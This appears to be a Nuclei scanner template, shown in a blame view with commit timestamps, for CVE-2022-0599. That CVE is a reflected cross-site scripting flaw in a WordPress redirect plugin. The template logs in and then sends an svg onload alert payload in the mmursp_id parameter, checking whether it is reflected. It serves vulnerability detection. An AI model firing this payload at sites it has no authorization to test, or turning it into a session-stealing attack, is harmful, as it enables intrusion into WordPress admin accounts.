2022-08-06 09:03:11 +00:00
id : CVE-2022-0599
info :
2022-09-10 01:55:52 +00:00
name : WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting
2022-08-06 09:03:11 +00:00
author : scent2d
2022-09-10 02:12:57 +00:00
severity : medium
2022-08-06 09:03:11 +00:00
description : |
2022-09-10 02:12:57 +00:00
WordPress Mapping Multiple URLs Redirect Same Page plugin 5.8 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page.
2023-09-06 11:59:08 +00:00
remediation : |
Update to the latest version of the WordPress Mapping Multiple URLs Redirect Same Page plugin (version 5.8 or higher) to mitigate this vulnerability.
2022-08-06 09:03:11 +00:00
reference :
- https://wpscan.com/vulnerability/4f1d45bc-d3bd-472c-959d-05abeff32765
2022-08-08 17:38:17 +00:00
- https://wordpress.org/plugins/mapping-multiple-urls-redirect-same-page/
2022-08-06 09:03:11 +00:00
- https://nvd.nist.gov/vuln/detail/cve-2022-0599
classification :
2022-09-10 02:12:57 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-10 01:55:52 +00:00
cve-id : CVE-2022-0599
2022-09-10 02:12:57 +00:00
cwe-id : CWE-79
2023-10-14 11:27:55 +00:00
epss-score : 0.00122
2023-10-18 16:26:30 +00:00
epss-percentile : 0.46131
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:mapping_multiple_urls_redirect_same_page_project:mapping_multiple_urls_redirect_same_page:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : mapping_multiple_urls_redirect_same_page_project
product : mapping_multiple_urls_redirect_same_page
2023-09-06 11:59:08 +00:00
framework : wordpress
2023-07-11 19:49:27 +00:00
tags : cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated,wpscan
2022-08-06 09:03:11 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-08-06 09:03:11 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
2022-08-06 09:24:52 +00:00
GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id="><svg/onload=alert(document.domain)> HTTP/1.1
2022-08-06 09:03:11 +00:00
Host : {{Hostname}}
cookie-reuse : true
req-condition : true
2023-07-11 19:49:27 +00:00
2022-08-08 17:38:17 +00:00
matchers-condition : and
2022-08-06 09:03:11 +00:00
matchers :
- type : dsl
dsl :
- 'status_code_2 == 200'
2023-06-19 21:10:30 +00:00
- 'contains(header_2, "text/html")'
2022-08-06 09:03:11 +00:00
condition : and
2023-07-11 19:49:27 +00:00
- type : word
part : body
words :
- 'id="mmursp_id" value="\"><svg/onload=alert(document.domain)>" />'